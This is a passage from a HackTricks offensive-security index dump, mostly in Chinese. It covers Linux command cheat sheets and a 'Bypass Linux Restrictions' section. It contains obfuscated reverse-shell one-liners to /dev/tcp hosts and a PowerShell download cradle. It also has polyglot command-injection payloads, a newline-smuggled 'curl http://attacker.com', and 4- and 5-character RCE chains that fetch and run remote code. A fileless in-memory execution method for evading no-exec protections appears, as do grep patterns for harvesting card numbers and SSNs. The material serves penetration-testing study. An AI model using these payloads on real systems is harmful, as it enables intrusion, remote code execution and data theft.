Name\\"(Fortune) and the \\"Common Name\\" (newuser@fortune.htb)\\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create certificate\\nopenssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate\\nopenssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)\\n# If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using:\\nopenssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12\\n# Decrypt ssh key\\nopenssl rsa -in key.ssh.enc -out key.ssh\\n#Decrypt\\nopenssl enc -aes256 -k -d -in backup.tgz.enc -out b.tgz #Count number of instructions executed by a program, need a host based linux (not working in VM)\\nperf stat -x, -e instructions:u \\"ls\\" #Find trick for HTB, find files from 2018-12-12 to 2018-12-14\\nfind / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -not -path \\"/proc/*\\" -not -path \\"/sys/*\\" -ls 2>/dev/null #Reconfigure timezone\\nsudo dpkg-reconfigure tzdata #Search from which package is a binary\\napt-file search /usr/bin/file #Needed: apt-get install apt-file #Protobuf decode https://www.ezequiel.tech/2020/08/leaking-google-cloud-projects.html\\necho \\"CIKUmMesGw==\\" | base64 -d | protoc --decode_raw #Set not removable bit\\nsudo chattr +i file.txt\\nsudo chattr -i file.txt #Remove the bit so you can delete it # List files inside zip\\n7z l file.zip","breadcrumbs":"Useful Linux Commands » 常见的 Bash","id":"1922","title":"常见的 Bash"},"1923":{"body":"bash #Base64 for Windows\\necho -n \\"IEX(New-Object Net.WebClient).downloadString(\'http://10.10.14.9:8000/9002.ps1\')\\" | iconv --to-code UTF-16LE | base64 -w0 #Exe compression\\nupx -9 nc.exe #Exe2bat\\nwine exe2bat.exe nc.exe nc.txt #Compile Windows python exploit to exe\\npip install pyinstaller\\nwget -O exploit.py http://www.exploit-db.com/download/31853\\npython pyinstaller.py --onefile exploit.py #Compile for windows\\n#sudo apt-get install gcc-mingw-w64-i686\\ni686-mingw32msvc-gcc -o executable useradd.c","breadcrumbs":"Useful Linux Commands » Windows上的Bash","id":"1923","title":"Windows上的Bash"},"1924":{"body":"bash #Extract emails from file\\ngrep -E -o \\"\\\\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\\\.[A-Za-z]{2,6}\\\\b\\" file.txt #Extract valid IP addresses\\ngrep -E -o \\"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\" file.txt #Extract passwords\\ngrep -i \\"pwd\\\\|passw\\" file.txt #Extract users\\ngrep -i \\"user\\\\|invalid\\\\|authentication\\\\|login\\" file.txt # Extract hashes\\n#Extract md5 hashes ({32}), sha1 ({40}), sha256({64}), sha512({128})\\negrep -oE \'(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)\' *.txt | egrep -o \'[a-fA-F0-9]{32}\' > md5-hashes.txt\\n#Extract valid MySQL-Old hashes\\ngrep -e \\"[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}\\" *.txt > mysql-old-hashes.txt\\n#Extract blowfish hashes\\ngrep -e \\"$2a\\\\$\\\\08\\\\$(.){75}\\" *.txt > blowfish-hashes.txt\\n#Extract Joomla hashes\\negrep -o \\"([0-9a-zA-Z]{32}):(w{16,32})\\" *.txt > joomla.txt\\n#Extract VBulletin hashes\\negrep -o \\"([0-9a-zA-Z]{32}):(S{3,32})\\" *.txt > vbulletin.txt\\n#Extraxt phpBB3-MD5\\negrep -o \'$H$S{31}\' *.txt > phpBB3-md5.txt\\n#Extract Wordpress-MD5\\negrep -o \'$P$S{31}\' *.txt > wordpress-md5.txt\\n#Extract Drupal 7\\negrep -o \'$S$S{52}\' *.txt > drupal-7.txt\\n#Extract old Unix-md5\\negrep -o \'$1$w{8}S{22}\' *.txt > md5-unix-old.txt\\n#Extract md5-apr1\\negrep -o \'$apr1$w{8}S{22}\' *.txt > md5-apr1.txt\\n#Extract sha512crypt, SHA512(Unix)\\negrep -o \'$6$w{8}S{86}\' *.txt > sha512crypt.txt #Extract e-mails from text files\\ngrep -E -o \\"\\\\b[a-zA-Z0-9.#?$*_-]+@[a-zA-Z0-9.#?$*_-]+.[a-zA-Z0-9.-]+\\\\b\\" *.txt > e-mails.txt #Extract HTTP URLs from text files\\ngrep http | grep -shoP \'http.*?[\\" >]\' *.txt > http-urls.txt\\n#For extracting HTTPS, FTP and other URL format use\\ngrep -E \'(((https|ftp|gopher)|mailto)[.:][^ >\\"\\t]*|www.[-a-z0-9.]+)[^ .,;\\t>\\">):]\' *.txt > urls.txt\\n#Note: if grep returns \\"Binary file (standard input) matches\\" use the following approaches # tr \'[\\\\000-\\\\011\\\\013-\\\\037177-377]\' \'.\' < *.log | grep -E \\"Your_Regex\\" OR # cat -v *.log | egrep -o \\"Your_Regex\\" #Extract Floating point numbers\\ngrep -E -o \\"^[-+]?[0-9]*.?[0-9]+([eE][-+]?[0-9]+)?$\\" *.txt > floats.txt # Extract credit card data\\n#Visa\\ngrep -E -o \\"4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}\\" *.txt > visa.txt\\n#MasterCard\\ngrep -E -o \\"5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}\\" *.txt > mastercard.txt\\n#American Express\\ngrep -E -o \\"\\\\b3[47][0-9]{13}\\\\b\\" *.txt > american-express.txt\\n#Diners Club\\ngrep -E -o \\"\\\\b3(?:0[0-5]|[68][0-9])[0-9]{11}\\\\b\\" *.txt > diners.txt\\n#Discover\\ngrep -E -o \\"6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}\\" *.txt > discover.txt\\n#JCB\\ngrep -E -o \\"\\\\b(?:2131|1800|35d{3})d{11}\\\\b\\" *.txt > jcb.txt\\n#AMEX\\ngrep -E -o \\"3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}\\" *.txt > amex.txt # Extract IDs\\n#Extract Social Security Number (SSN)\\ngrep -E -o \\"[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}\\" *.txt > ssn.txt\\n#Extract Indiana Driver License Number\\ngrep -E -o \\"[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}\\" *.txt > indiana-dln.txt\\n#Extract US Passport Cards\\ngrep -E -o \\"C0[0-9]{7}\\" *.txt > us-pass-card.txt\\n#Extract US Passport Number\\ngrep -E -o \\"[23][0-9]{8}\\" *.txt > us-pass-num.txt\\n#Extract US Phone Numberss\\ngrep -Po \'d{3}[s-_]?d{3}[s-_]?d{4}\' *.txt > us-phones.txt\\n#Extract ISBN Numbers\\negrep -a -o \\"\\\\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\\\\b\\" *.txt > isbn.txt","breadcrumbs":"Useful Linux Commands » Greps","id":"1924","title":"Greps"},"1925":{"body":"bash # Find SUID set files.\\nfind / -perm /u=s -ls 2>/dev/null # Find SGID set files.\\nfind / -perm /g=s -ls 2>/dev/null # Found Readable directory and sort by time. (depth = 4)\\nfind / -type d -maxdepth 4 -readable -printf \\"%T@ %Tc | %p \\\\n\\" 2>/dev/null | grep -v \\"| /proc\\" | grep -v \\"| /dev\\" | grep -v \\"| /run\\" | grep -v \\"| /var/log\\" | grep -v \\"| /boot\\" | grep -v \\"| /sys/\\" | sort -n -r # Found Writable directory and sort by time. (depth = 10)\\nfind / -type d -maxdepth 10 -writable -printf \\"%T@ %Tc | %p \\\\n\\" 2>/dev/null | grep -v \\"| /proc\\" | grep -v \\"| /dev\\" | grep -v \\"| /run\\" | grep -v \\"| /var/log\\" | grep -v \\"| /boot\\" | grep -v \\"| /sys/\\" | sort -n -r # Or Found Own by Current User and sort by time. (depth = 10)\\nfind / -maxdepth 10 -user $(id -u) -printf \\"%T@ %Tc | %p \\\\n\\" 2>/dev/null | grep -v \\"| /proc\\" | grep -v \\"| /dev\\" | grep -v \\"| /run\\" | grep -v \\"| /var/log\\" | grep -v \\"| /boot\\" | grep -v \\"| /sys/\\" | sort -n -r # Or Found Own by Current Group ID and Sort by time. (depth = 10)\\nfind / -maxdepth 10 -group $(id -g) -printf \\"%T@ %Tc | %p \\\\n\\" 2>/dev/null | grep -v \\"| /proc\\" | grep -v \\"| /dev\\" | grep -v \\"| /run\\" | grep -v \\"| /var/log\\" | grep -v \\"| /boot\\" | grep -v \\"| /sys/\\" | sort -n -r # Found Newer files and sort by time. (depth = 5)\\nfind / -maxdepth 5 -printf \\"%T@ %Tc | %p \\\\n\\" 2>/dev/null | grep -v \\"| /proc\\" | grep -v \\"| /dev\\" | grep -v \\"| /run\\" | grep -v \\"| /var/log\\" | grep -v \\"| /boot\\" | grep -v \\"| /sys/\\" | sort -n -r | less # Found Newer files only and sort by time. (depth = 5)\\nfind / -maxdepth 5 -type f -printf \\"%T@ %Tc | %p \\\\n\\" 2>/dev/null | grep -v \\"| /proc\\" | grep -v \\"| /dev\\" | grep -v \\"| /run\\" | grep -v \\"| /var/log\\" | grep -v \\"| /boot\\" | grep -v \\"| /sys/\\" | sort -n -r | less # Found Newer directory only and sort by time. (depth = 5)\\nfind / -maxdepth 5 -type d -printf \\"%T@ %Tc | %p \\\\n\\" 2>/dev/null | grep -v \\"| /proc\\" | grep -v \\"| /dev\\" | grep -v \\"| /run\\" | grep -v \\"| /var/log\\" | grep -v \\"| /boot\\" | grep -v \\"| /sys/\\" | sort -n -r | less","breadcrumbs":"Useful Linux Commands » 查找","id":"1925","title":"查找"},"1926":{"body":"bash #Nmap scripts ((default or version) and smb))\\nnmap --script-help \\"(default or version) and *smb*\\"\\nlocate -r \'\\\\.nse$\' | xargs grep categories | grep \'default\\\\|version\\\\|safe\' | grep smb\\nnmap --script-help \\"(default or version) and smb)\\"","breadcrumbs":"Useful Linux Commands » Nmap 搜索帮助","id":"1926","title":"Nmap 搜索帮助"},"1927":{"body":"bash #All bytes inside a file (except 0x20 and 0x00)\\nfor j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v \\"20\\\\|00\\"); do echo -n -e \\"\\\\x$j\\" >> bytes; done","breadcrumbs":"Useful Linux Commands » Bash","id":"1927","title":"Bash"},"1928":{"body":"bash #Delete curent rules and chains\\niptables --flush\\niptables --delete-chain #allow loopback\\niptables -A INPUT -i lo -j ACCEPT\\niptables -A OUTPUT -o lo -j ACCEPT #drop ICMP\\niptables -A INPUT -p icmp -m icmp --icmp-type any -j DROP\\niptables -A OUTPUT -p icmp -j DROP #allow established connections\\niptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT #allow ssh, http, https, dns\\niptables -A INPUT -s 10.10.10.10/24 -p tcp -m tcp --dport 22 -j ACCEPT\\niptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT\\niptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPT\\niptables -A INPUT -p udp -m udp --sport 53 -j ACCEPT\\niptables -A INPUT -p tcp -m tcp --sport 53 -j ACCEPT\\niptables -A OUTPUT -p udp -m udp --dport 53 -j ACCEPT\\niptables -A OUTPUT -p tcp -m tcp --dport 53 -j ACCEPT #default policies\\niptables -P INPUT DROP\\niptables -P FORWARD ACCEPT\\niptables -P OUTPUT ACCEPT tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Useful Linux Commands » Iptables","id":"1928","title":"Iptables"},"1929":{"body":"Reading time: 13 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Bypass Linux Restrictions » 绕过 Linux 限制","id":"1929","title":"绕过 Linux 限制"},"193":{"body":"连接到网络的设备可以通过设备的 Web 服务 (WSD) 识别可用服务,如打印机。这涉及广播 UDP 数据包。寻求服务的设备发送请求,而服务提供者则宣布其提供的服务。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » 设备的 Web 服务 (WSD)","id":"193","title":"设备的 Web 服务 (WSD)"},"1930":{"body":"","breadcrumbs":"Bypass Linux Restrictions » 常见限制绕过","id":"1930","title":"常见限制绕过"},"1931":{"body":"bash # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time\\necho \\"echo $(echo \'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1\' | base64 | base64)|ba\'\'se\'\'6\'\'4 -\'\'d|ba\'\'se\'\'64 -\'\'d|b\'\'a\'\'s\'\'h\\" | sed \'s/ /${IFS}/g\'\\n# echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba\'\'se\'\'6\'\'4${IFS}-\'\'d|ba\'\'se\'\'64${IFS}-\'\'d|b\'\'a\'\'s\'\'h","breadcrumbs":"Bypass Linux Restrictions » 反向 Shell","id":"1931","title":"反向 Shell"},"1932":{"body":"bash #Trick from Dikline\\n#Get a rev shell with\\n(sh)0>/dev/tcp/10.10.10.10/443\\n#Then get the out of the rev shell executing inside of it:\\nexec >&0","breadcrumbs":"Bypass Linux Restrictions » 短 Rev shell","id":"1932","title":"短 Rev shell"},"1933":{"body":"bash # Question mark binary substitution\\n/usr/bin/p?ng # /usr/bin/ping\\nnma? -p 80 localhost # /usr/bin/nmap -p 80 localhost # Wildcard(*) binary substitution\\n/usr/bin/who*mi # /usr/bin/whoami # Wildcard + local directory arguments\\ntouch -- -la # -- stops processing options after the --\\nls *\\necho * #List current files and folders with echo and wildcard # [chars]\\n/usr/bin/n[c] # /usr/bin/nc # Quotes\\n\'p\'i\'n\'g # ping\\n\\"w\\"h\\"o\\"a\\"m\\"i # whoami\\nech\'\'o test # echo test\\nech\\"\\"o test # echo test\\nbas\'\'e64 # base64 #Backslashes\\n\\\\u\\\\n\\\\a\\\\m\\\\e \\\\-\\\\a # uname -a\\n/\\\\b\\\\i\\\\n/////s\\\\h # $@\\nwho$@ami #whoami # Transformations (case, reverse, base64)\\n$(tr \\"[A-Z]\\" \\"[a-z]\\"<<<\\"WhOaMi\\") #whoami -> Upper case to lower case\\n$(a=\\"WhOaMi\\";printf %s \\"${a,,}\\") #whoami -> transformation (only bash)\\n$(rev<<<\'imaohw\') #whoami\\nbash<<<$(base64 -d<< /tmp/[\\nchmod +x [\\nexport PATH=/tmp:$PATH\\nif [ \\"a\\" ]; then echo 1; fi # Will print hello!","breadcrumbs":"Bypass Linux Restrictions » 内置命令","id":"1942","title":"内置命令"},"1943":{"body":"bash 1;sleep${IFS}9;#${IFS}\';sleep${IFS}9;#${IFS}\\";sleep${IFS}9;#${IFS}\\n/*$(sleep 5)`sleep 5``*/-sleep(5)-\'/*$(sleep 5)`sleep 5` #*/-sleep(5)||\'\\"||sleep(5)||\\"/*`*/","breadcrumbs":"Bypass Linux Restrictions » 多语言命令注入","id":"1943","title":"多语言命令注入"},"1944":{"body":"bash # A regex that only allow letters and numbers might be vulnerable to new line characters\\n1%0a`curl http://attacker.com`","breadcrumbs":"Bypass Linux Restrictions » 绕过潜在的正则表达式","id":"1944","title":"绕过潜在的正则表达式"},"1945":{"body":"bash # From https://github.com/Bashfuscator/Bashfuscator\\n./bashfuscator -c \'cat /etc/passwd\'","breadcrumbs":"Bypass Linux Restrictions » Bashfuscator","id":"1945","title":"Bashfuscator"},"1946":{"body":"bash # From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge\\n#Oragnge Tsai solution\\n## Step 1: generate `ls -t>g` to file \\"_\\" to be able to execute ls ordening names by cration date\\nhttp://host/?cmd=>ls\\\\\\nhttp://host/?cmd=ls>_\\nhttp://host/?cmd=>\\\\ \\\\\\nhttp://host/?cmd=>-t\\\\\\nhttp://host/?cmd=>\\\\>g\\nhttp://host/?cmd=ls>>_ ## Step2: generate `curl orange.tw|python` to file \\"g\\"\\n## by creating the necesary filenames and writting that content to file \\"g\\" executing the previous generated file\\nhttp://host/?cmd=>on\\nhttp://host/?cmd=>th\\\\\\nhttp://host/?cmd=>py\\\\\\nhttp://host/?cmd=>\\\\|\\\\\\nhttp://host/?cmd=>tw\\\\\\nhttp://host/?cmd=>e.\\\\\\nhttp://host/?cmd=>ng\\\\\\nhttp://host/?cmd=>ra\\\\\\nhttp://host/?cmd=>o\\\\\\nhttp://host/?cmd=>\\\\ \\\\\\nhttp://host/?cmd=>rl\\\\\\nhttp://host/?cmd=>cu\\\\\\nhttp://host/?cmd=sh _\\n# Note that a \\"\\\\\\" char is added at the end of each filename because \\"ls\\" will add a new line between filenames whenwritting to the file ## Finally execute the file \\"g\\"\\nhttp://host/?cmd=sh g # Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/\\n# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with \\"*\\"\\nhttps://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/\\n## Execute tar command over a folder\\nhttp://52.199.204.34/?cmd=>tar\\nhttp://52.199.204.34/?cmd=>zcf\\nhttp://52.199.204.34/?cmd=>zzz\\nhttp://52.199.204.34/?cmd=*%20/h* # Another curiosity if you can read files of the current folder\\nln /f*\\n## If there is a file /flag.txt that will create a hard link\\n## to it in the current folder","breadcrumbs":"Bypass Linux Restrictions » 5个字符的RCE","id":"1946","title":"5个字符的RCE"},"1947":{"body":"bash # In a similar fashion to the previous bypass this one just need 4 chars to execute commands\\n# it will follow the same principle of creating the command `ls -t>g` in a file\\n# and then generate the full command in filenames\\n# generate \\"g> ht- sl\\" to file \\"v\\"\\n\'>dir\'\\n\'>sl\'\\n\'>g\\\\>\'\\n\'>ht-\'\\n\'*>v\' # reverse file \\"v\\" to file \\"x\\", content \\"ls -th >g\\"\\n\'>rev\'\\n\'*v>x\' # generate \\"curl orange.tw|python;\\"\\n\'>\\\\;\\\\\\\\\'\\n\'>on\\\\\\\\\'\\n\'>th\\\\\\\\\'\\n\'>py\\\\\\\\\'\\n\'>\\\\|\\\\\\\\\'\\n\'>tw\\\\\\\\\'\\n\'>e.\\\\\\\\\'\\n\'>ng\\\\\\\\\'\\n\'>ra\\\\\\\\\'\\n\'>o\\\\\\\\\'\\n\'>\\\\ \\\\\\\\\'\\n\'>rl\\\\\\\\\'\\n\'>cu\\\\\\\\\' # got shell\\n\'sh x\'\\n\'sh g\'","breadcrumbs":"Bypass Linux Restrictions » RCE 与 4 个字符","id":"1947","title":"RCE 与 4 个字符"},"1948":{"body":"如果您在一个具有 只读和无执行保护 的文件系统中,甚至在一个无发行版容器中,仍然有方法可以 执行任意二进制文件,甚至是一个 shell!: Bypass FS protections: read-only / no-exec / Distroless","breadcrumbs":"Bypass Linux Restrictions » 只读/无执行/无发行版旁路","id":"1948","title":"只读/无执行/无发行版旁路"},"1949":{"body":"Escaping from Jails","breadcrumbs":"Bypass Linux Restrictions » Chroot 和其他监狱旁路","id":"1949","title":"Chroot 和其他监狱旁路"},"195":{"body":"RADIUS(远程身份验证拨号用户服务)是一种网络访问协议,主要由 ISP 使用。它支持身份验证、授权和计费。用户凭据由 RADIUS 服务器验证,可能包括网络地址验证以增强安全性。身份验证后,用户获得网络访问权限,其会话详细信息会被跟踪以用于计费和统计目的。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » RADIUS","id":"195","title":"RADIUS"},"1950":{"body":"当一个漏洞让您部分控制一个最终到达 system() 或另一个 shell 的参数时,您可能不知道执行开始读取您的有效负载的确切偏移量。传统的 NOP 滑道(例如 \\\\x90)在 shell 语法中 不 起作用,但 Bash 会在执行命令之前无害地忽略前导空格。 因此,您可以通过在真实命令前加上一长串空格或制表符来创建一个 Bash 的 NOP 滑道 : bash # Payload sprayed into an environment variable / NVRAM entry\\n\\" nc -e /bin/sh 10.0.0.1 4444\\"\\n# 16× spaces ───┘ ↑ real command 如果 ROP 链(或任何内存损坏原语)将指令指针放置在空间块内,Bash 解析器会简单地跳过空格,直到到达 nc,可靠地执行您的命令。 实际使用案例: 内存映射配置块 (例如 NVRAM),可跨进程访问。 攻击者无法写入 NULL 字节以对齐有效负载的情况。 仅提供 BusyBox ash/sh 的嵌入式设备 – 它们也会忽略前导空格。 🛠️ 将此技巧与调用 system() 的 ROP 小工具结合使用,可以显著提高在内存受限的 IoT 路由器上的利用可靠性。","breadcrumbs":"Bypass Linux Restrictions » 基于空间的 Bash NOP 滑道 (\\"Bashsledding\\")","id":"1950","title":"基于空间的 Bash NOP 滑道 (\\"Bashsledding\\")"},"1951":{"body":"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0 https://www.secjuice.com/web-application-firewall-waf-evasion/ Exploiting zero days in abandoned hardware – Trail of Bits blog tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Bypass Linux Restrictions » 参考资料与更多信息","id":"1951","title":"参考资料与更多信息"},"1952":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » 绕过文件系统保护:只读 / 无执行 / Distroless","id":"1952","title":"绕过文件系统保护:只读 / 无执行 / Distroless"},"1953":{"body":"在以下视频中,您可以找到本页面提到的技术的更深入解释: DEF CON 31 - 探索Linux内存操控以实现隐蔽和规避 使用DDexec-ng和内存dlopen()进行隐蔽入侵 - HackTricks Track 2023","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » 视频","id":"1953","title":"视频"},"1954":{"body":"越来越多的Linux机器以 只读(ro)文件系统保护 的方式挂载,特别是在容器中。这是因为运行一个ro文件系统的容器就像在securitycontext中设置**readOnlyRootFilesystem: true**一样简单: apiVersion: v1\\nkind: Pod\\nmetadata:\\nname: alpine-pod\\nspec:\\ncontainers:\\n- name: alpine\\nimage: alpine\\nsecurityContext: readOnlyRootFilesystem: true command: [\\"sh\\", \\"-c\\", \\"while true; do sleep 1000; done\\"] 然而,即使文件系统以ro方式挂载, /dev/shm 仍然是可写的,因此我们不能写入磁盘的说法是错误的。然而,这个文件夹将会 以无执行保护挂载 ,所以如果您在这里下载一个二进制文件,您 将无法执行它 。 warning 从红队的角度来看,这使得 下载和执行 系统中尚不存在的二进制文件(如后门或像kubectl这样的枚举器)变得 复杂 。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » 只读 / 无执行场景","id":"1954","title":"只读 / 无执行场景"},"1955":{"body":"请注意,我提到的是二进制文件,您可以 执行任何脚本 ,只要解释器在机器内部,例如如果sh存在,则可以执行 shell脚本 ,或者如果安装了python,则可以执行 python脚本 。 然而,这并不足以执行您的二进制后门或您可能需要运行的其他二进制工具。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » 最简单的绕过:脚本","id":"1955","title":"最简单的绕过:脚本"},"1956":{"body":"如果您想执行一个二进制文件,但文件系统不允许这样做,最好的方法是通过 从内存中执行它 ,因为 保护措施不适用于那里 。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » 内存绕过","id":"1956","title":"内存绕过"},"1957":{"body":"如果您在机器内部有一些强大的脚本引擎,例如 Python 、 Perl 或 Ruby ,您可以将二进制文件下载到内存中执行,将其存储在内存文件描述符中(create_memfd系统调用),这不会受到这些保护的限制,然后调用**exec系统调用**,将 fd作为要执行的文件 。 为此,您可以轻松使用项目 fileless-elf-exec 。您可以传递一个二进制文件,它将生成一个指定语言的脚本, 二进制文件经过压缩和b64编码 ,并包含 解码和解压缩 它的指令,使用调用create_memfd系统调用创建的 fd ,以及调用 exec 系统调用来运行它。 warning 这在其他脚本语言中不起作用,例如PHP或Node,因为它们没有任何 默认方式从脚本调用原始系统调用 ,因此无法调用create_memfd来创建 内存fd 以存储二进制文件。 此外,使用/dev/shm中的文件创建 常规fd 也不起作用,因为您将无法运行它,因为 无执行保护 将适用。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » FD + exec系统调用绕过","id":"1957","title":"FD + exec系统调用绕过"},"1958":{"body":"DDexec / EverythingExec 是一种技术,允许您通过覆盖其**/proc/self/mem 来 修改您自己的进程的内存**。 因此, 控制正在被进程执行的汇编代码 ,您可以编写 shellcode 并“变异”该进程以 执行任何任意代码 。 tip DDexec / EverythingExec 将允许您加载并 执行 您自己的 shellcode 或 任何二进制文件 从 内存 中。 bash # Basic example\\nwget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar 有关此技术的更多信息,请查看 Github 或: DDexec / EverythingExec","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » DDexec / EverythingExec","id":"1958","title":"DDexec / EverythingExec"},"1959":{"body":"Memexec 是 DDexec 的自然下一步。它是一个 DDexec shellcode demonised ,因此每次您想要 运行不同的二进制文件 时,您无需重新启动 DDexec,只需通过 DDexec 技术运行 memexec shellcode,然后 与此守护进程通信以传递要加载和运行的新二进制文件 。 您可以在 https://github.com/arget13/memexec/blob/main/a.php 中找到如何使用 memexec 从 PHP 反向 shell 执行二进制文件 的示例。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » MemExec","id":"1959","title":"MemExec"},"196":{"body":"","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » SMB 和 NetBIOS","id":"196","title":"SMB 和 NetBIOS"},"1960":{"body":"与 DDexec 目的相似, memdlopen 技术允许以 更简单的方式在内存中加载二进制文件 以便后续执行。它甚至可以加载带有依赖项的二进制文件。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » Memdlopen","id":"1960","title":"Memdlopen"},"1961":{"body":"","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » Distroless Bypass","id":"1961","title":"Distroless Bypass"},"1962":{"body":"Distroless 容器仅包含 运行特定应用程序或服务所需的最低组件 ,例如库和运行时依赖项,但排除了较大的组件,如包管理器、shell 或系统实用程序。 Distroless 容器的目标是 通过消除不必要的组件来减少容器的攻击面 ,并最小化可以被利用的漏洞数量。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » 什么是 distroless","id":"1962","title":"什么是 distroless"},"1963":{"body":"在 distroless 容器中,您可能 甚至找不到 sh 或 bash 来获取常规 shell。您也不会找到 ls、whoami、id 等二进制文件……您通常在系统中运行的所有内容。 warning 因此,您 将无法 获取 反向 shell 或 枚举 系统,如您通常所做的那样。 然而,如果被攻陷的容器正在运行例如 flask web,那么 python 已安装,因此您可以获取 Python 反向 shell 。如果它正在运行 node,您可以获取 Node rev shell,其他大多数 脚本语言 也是如此。 tip 使用脚本语言,您可以 使用语言功能枚举系统 。 如果没有 read-only/no-exec 保护,您可以利用反向 shell 在文件系统中写入您的二进制文件 并 执行 它们。 tip 然而,在这种类型的容器中,这些保护通常会存在,但您可以使用 先前的内存执行技术来绕过它们 。 您可以在 https://github.com/carlospolop/DistrolessRCE 中找到 示例 ,了解如何 利用一些 RCE 漏洞 获取脚本语言的 反向 shell 并从内存中执行二进制文件。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 